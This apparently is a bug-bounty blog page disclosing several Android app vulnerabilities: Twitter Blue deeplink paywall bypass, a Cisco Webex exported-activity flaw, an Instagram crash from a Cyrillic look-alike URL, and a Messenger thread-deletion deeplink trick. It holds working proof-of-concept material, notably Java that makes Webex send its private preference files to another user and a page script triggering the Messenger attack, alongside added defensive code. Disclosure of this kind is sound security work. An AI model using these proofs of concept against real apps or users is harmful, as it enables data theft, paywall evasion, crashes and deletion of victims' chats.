Access Twitter Blue features using deeplinks without a subscription.

Twitter recently launched Twitter Blue for Android users, allowing them to change the app icon and undo tweets at any time. Twitter for Android version 9.76.0-release.0 implements some deeplinks for Twitter subscription features to perform direct actions, and some of those deeplinks are not validated and do not check whether the user has a subscription, so it is possible to use the change icon, custom navigation, and early access features without a subscription using the deeplinks below:

twitter://subscriptions/settings/extras
twitter://subscriptions/settings/early_access

The extras deeplink gives access to the change icon and custom navigation features, and the early_access deeplink gives access to features such as undo tweet with custom timing.

Steps To Reproduce:

Launch the deeplink below using adb to access the app icon change flow:

adb shell am start -d "twitter://subscriptions/settings/extras"

Launch the deeplink below using adb to access the undo tweet feature:

adb shell am start -d "twitter://subscriptions/settings/early_access"
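As an added example (not Twitter's code), a single deeplink entry Activity for twitter://subscriptions/settings/<feature> that applies the subscription check before any routing, so the feature screens are never reachable directly by URI; the in-app action strings and the fail-closed hasActiveSubscription() default are assumptions of this example.

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import java.util.List;

// Hypothetical entry point for twitter://subscriptions/settings/<feature>.
// The destination is decided by route() only after the entitlement check.
public class SubscriptionDeepLinkActivity extends Activity {

    public enum Target { REJECT, UPSELL, EXTRAS, EARLY_ACCESS }

    // Pure routing decision, kept separate from the Activity so it is testable.
    public static Target route(Uri data, boolean hasActiveSubscription) {
        if (data == null || !"twitter".equals(data.getScheme())
                || !"subscriptions".equals(data.getHost())) {
            return Target.REJECT;
        }
        List<String> segs = data.getPathSegments();   // expect ["settings", "<feature>"]
        if (segs.size() != 2 || !"settings".equals(segs.get(0))) {
            return Target.REJECT;
        }
        String feature = segs.get(1);
        if (!"extras".equals(feature) && !"early_access".equals(feature)) {
            return Target.REJECT;                     // unknown feature name
        }
        // Gate first: the outcome for an unsubscribed account is the same
        // whichever gated deeplink was used.
        if (!hasActiveSubscription) {
            return Target.UPSELL;
        }
        return "extras".equals(feature) ? Target.EXTRAS : Target.EARLY_ACCESS;
    }

    // Fail closed. The real app overrides this with server-confirmed state,
    // never with a flag that a deeplink or local preference can set.
    protected boolean hasActiveSubscription() { return false; }

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        Target target = route(getIntent().getData(), hasActiveSubscription());
        // Hypothetical in-app action names, restricted to this package.
        String action = target == Target.EXTRAS ? "com.example.app.SHOW_EXTRAS"
                : target == Target.EARLY_ACCESS ? "com.example.app.SHOW_EARLY_ACCESS"
                : target == Target.UPSELL ? "com.example.app.SHOW_UPSELL" : null;
        if (action != null) {
            startActivity(new Intent(action).setPackage(getPackageName()));
        }
        finish();   // REJECT: malformed or unknown deeplink, nothing is opened
    }
}
```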

Proof of concept:

Cisco Webex Teams Mobile (Android) Information Disclosure Vulnerability


A vulnerability in the Cisco Webex Teams Mobile (Android) application could allow a local attacker to access non-sensitive information from an authenticated Webex Teams Mobile user.

The vulnerability is due to improper access handling in the affected software. An attacker could exploit this vulnerability by leveraging the improper access handling through a third-party application on an affected device. A successful exploit could allow the attacker to share non-sensitive information to any Webex Space the authenticated Webex Teams Mobile (Android) user has access to.

Affected Version: This vulnerability affected Cisco Webex Teams Mobile (Android) releases earlier than Release 41.5.1.

The Cisco PSIRT has assigned this bug the following CVSS version 3.1 score. The Base CVSS score as of the time of evaluation is 3.3.

Acknowledgement by Cisco:

https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvx83611

Vulnerability Description: 

The Webex Teams app exports the com.webex.teams.crosslaunch.message activity, which is associated with the sharing fragment that shares content to a space or a 1:1 conversation using parameters and actions such as android.intent.extra.STREAM and android.intent.action.SEND.

So any third-party app could use those parameters to share content, because the app failed to validate the path and file (and whether it should have permission to share it) before sending the content.

Step to reproduce:

  • Create an Android app using the code snippet below:
import androidx.appcompat.app.AppCompatActivity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.os.StrictMode;

public class MainActivity extends AppCompatActivity {
  @Override
  protected void onCreate(Bundle savedInstanceState) {
    super.onCreate(savedInstanceState);
    setContentView(R.layout.activity_main);
    // Relax the VM policy so a file:// URI can be placed in an intent
    // (API 24+ would otherwise throw FileUriExposedException).
    StrictMode.VmPolicy.Builder builder = new StrictMode.VmPolicy.Builder();
    StrictMode.setVmPolicy(builder.build());
    // Path inside Webex Teams' private data directory; the receiving
    // activity resolves it with its own identity, not the caller's.
    Uri uri = Uri.parse("file:///data/data/com.cisco.wx2.android/shared_prefs/com.cisco.wx2.android_preferences.xml");
    // Explicitly target the exported share activity with ACTION_SEND.
    Intent intent = new Intent("android.intent.action.SEND");
    intent.setClassName("com.cisco.wx2.android", "com.webex.teams.crosslaunch.message");
    intent.putExtra("android.intent.extra.STREAM", uri);
    intent.setType("");
    startActivity(intent);
  }
}
  • Once created, run this app on a device where Webex Teams is installed.
  • Running the created app opens the Webex Teams messaging window to select a target. Select a target user; the app attaches the com.cisco.wx2.android_preferences.xml file to be sent.
  • Click the send button; the attached internal file is sent to the target user. This also allows access to data/data/com.cisco.wx2.android/*, so all files in the app's data directory, including databases, could be stolen.
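An added example, not Webex code, of the validation an exported ACTION_SEND receiver can apply to android.intent.extra.STREAM so a caller cannot point it at the receiver's own private files; the class name and the package-name authority heuristic are this example's assumptions.

```java
import android.content.Context;
import android.content.Intent;
import android.net.Uri;
import java.io.File;
import java.io.IOException;

// Hypothetical helper for an exported share-receiving activity.
public final class IncomingStreamValidator {

    private IncomingStreamValidator() {}

    // Returns the URI if it may be attached, or null if it must be dropped.
    public static Uri validate(Context ctx, Intent intent) throws IOException {
        if (!Intent.ACTION_SEND.equals(intent.getAction())) return null;
        Uri uri = intent.getParcelableExtra(Intent.EXTRA_STREAM);
        if (uri == null) return null;

        if ("file".equals(uri.getScheme())) {
            // A file:// path is opened with the receiving app's own identity, so a
            // caller can name files only this app may read. Canonicalise (follows
            // symlinks and ".."), then refuse anything under our private storage.
            // Refusing file:// altogether is the stricter option on API 24+.
            String path = uri.getPath();
            if (path == null) return null;
            File requested = new File(path).getCanonicalFile();
            File internal = ctx.getFilesDir().getParentFile();   // /data/data/<pkg>
            File external = ctx.getExternalFilesDir(null);
            if (isInside(requested, internal) || isInside(requested, ctx.getCacheDir())
                    || (external != null && isInside(requested, external.getParentFile()))) {
                return null;
            }
            return uri;
        }
        if ("content".equals(uri.getScheme())) {
            // Accept only a provider outside this app (our own providers would again
            // expose our data; assumed to be named after the package) and only when
            // the caller actually granted read access on the intent.
            String authority = uri.getAuthority();
            if (authority == null || authority.startsWith(ctx.getPackageName())) return null;
            boolean granted = (intent.getFlags() & Intent.FLAG_GRANT_READ_URI_PERMISSION) != 0;
            return granted ? uri : null;
        }
        return null;   // http, javascript or any other scheme is not an attachment
    }

    private static boolean isInside(File candidate, File dir) throws IOException {
        File canonicalDir = dir.getCanonicalFile();
        return candidate.equals(canonicalDir)
                || candidate.getPath().startsWith(canonicalDir.getPath() + File.separator);
    }
}
```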

Proof of Concept:
Download Video : https://drive.google.com/file/d/1SXElqWb9aFdUEuqjxilRsNCv5PB1mIDv/view?usp=sharing


Note: This vulnerability requires the user to be logged into the Teams app, and only non-sensitive information (some app and OS settings, and cached images) can be shared to other Webex spaces. All sensitive information is encrypted, so no CVE was assigned.

Crash Instagram Bug (Android) using U+043E (Unpatched)


Instagram for Android does not handle some Cyrillic letters such as U+043E (CYRILLIC SMALL LETTER O), so a hostname built with the Cyrillic small letter о, like the one below, can crash Instagram:

http://gооgle.com/

Copy the above URL and post it in an Instagram profile, or send it to a user in chat.

To try this, go to my Instagram https://instagram.com/rahulkankrale and click on google.com.

Instagram crashes with an exception:


Video for proof of concept:

Using this bug, a malicious user could crash an Instagram Live by sending this URL to the host.

I didn’t report this, as it has no security impact because of the user interaction required.
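An added example, not Instagram's code, showing how a link renderer can handle a hostname containing U+043E without crashing and detect the Latin/Cyrillic mix before displaying it; the sample host is constructed here from the page's gооgle.com example.

```java
import java.net.IDN;
import java.util.EnumSet;
import java.util.Set;

// Hypothetical hostname check for a link renderer: the host is converted to
// its ASCII (punycode) form under a guard, and labels mixing Latin with
// another script are flagged so they are not shown as the Latin look-alike.
public final class HostnameCheck {

    public static final class Result {
        public final String asciiHost;    // A-label form, null if the host is invalid
        public final boolean mixedScript; // some label mixes Latin with another script
        Result(String asciiHost, boolean mixedScript) {
            this.asciiHost = asciiHost;
            this.mixedScript = mixedScript;
        }
    }

    // Sample constructed for this example: "g" + two U+043E + "gle.com".
    public static final String SAMPLE_HOST = "g\u043E\u043Egle.com";

    public static Result inspect(String host) {
        String ascii;
        try {
            // IDN.toASCII runs nameprep and punycode-encodes each label. It throws
            // IllegalArgumentException on prohibited or over-long input, so the
            // call is guarded instead of being allowed to take the UI down.
            ascii = IDN.toASCII(host);
        } catch (IllegalArgumentException e) {
            return new Result(null, false);
        }
        boolean mixed = false;
        for (String label : host.split("\\.")) {
            Set<Character.UnicodeScript> scripts = EnumSet.noneOf(Character.UnicodeScript.class);
            label.codePoints().forEach(cp -> {
                Character.UnicodeScript s = Character.UnicodeScript.of(cp);
                // COMMON covers digits and the hyphen, allowed beside any script.
                if (s != Character.UnicodeScript.COMMON) scripts.add(s);
            });
            if (scripts.size() > 1) mixed = true;
        }
        return new Result(ascii, mixed);
    }

    public static void main(String[] args) {
        Result r = inspect(SAMPLE_HOST);
        // The A-label starts with "xn--" and the first label mixes LATIN with
        // CYRILLIC, so the link should be rendered in ASCII form or flagged.
        System.out.println(r.asciiHost + " mixedScript=" + r.mixedScript);
    }
}
```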

Facebook Messenger for android indirect thread deletion vulnerability.


Description:

Facebook Messenger for Android reuses the thread ID when invoked via deeplink, which could have allowed an attacker to cause an indirect thread deletion.

This can lead to confusing behaviour on the user side. One example: the user has a 1:1 chat with the attacker. The attacker then forces the user to create a new group chat with the same thread ID, which is not functional. If the user deletes that chat, the original chat with the attacker also disappears.

So the attacker could use this method to delete the thread between the victim and their friend, as well as delete chats from the victim's Messenger, because the victim is not able to leave the duplicate group thread and their only option is to delete the conversation.

Deeplink used: fb-messenger://groupthreadfbid/%s

For automatic redirection using a webpage:

Repro steps :

Messenger App version (Android) : 274.0.0.18.120

Create a webpage with the script below (replace the user ID with your user ID) and host it:

<script>
function trigger() {
  document.location = "fb-messenger://groupthreadfbid/100000505765955";
}
setTimeout(trigger, 1000);
</script>

1. Send the crafted webpage link to a user you have previously interacted with.

2. On the victim's phone, click that link; it opens a blank page and redirects back to the thread.

3. Send a message to the victim, or wait for the victim to close and reopen the app; a duplicate thread with the same ID is created between you and the victim on the victim's phone.

4. Now if the victim sends a message, it shows in both threads.

5. The victim goes to the duplicate (group) thread, taps on members and then on admin, and sees "No admin".

6. Now if they try to leave that group, they get an error, so the victim's only remaining option is to delete the duplicate thread, which is the group thread.

7. Once the victim deletes the duplicate thread by selecting "delete conversation", the original thread is also deleted. This deletion is permanent, as the thread is no longer visible on the web after deletion.

Timeline:

27/07/2020: Report submitted.

29/07/2020: FB managed to reproduce.

03/08/2020: Triaged

03/09/2020: Fixed

10/09/2020: Bounty

POC:



Sending ephemeral message – disposable message to any Facebook user


Description:

Facebook Messenger Rooms has a feature to share the room link to other apps when a room is created, and it was vulnerable to ephemeral (disposable) messages. Using doc id 3350161661730468 and the "sendMessage" FB API, the caller sends a room link to another user when we select "Messenger"; this creates an offline thread.

If we change the "id" value to the victim's user ID, the "message" value to any text, and the "offline_threading_id" to any random number, the victim gets a message notification and a thread popup window opens on their end showing the message sent by the attacker, but if they refresh or go to "Show in Messenger" the message disappears.

Continue reading “Sending ephemeral message – disposable message to any Facebook user”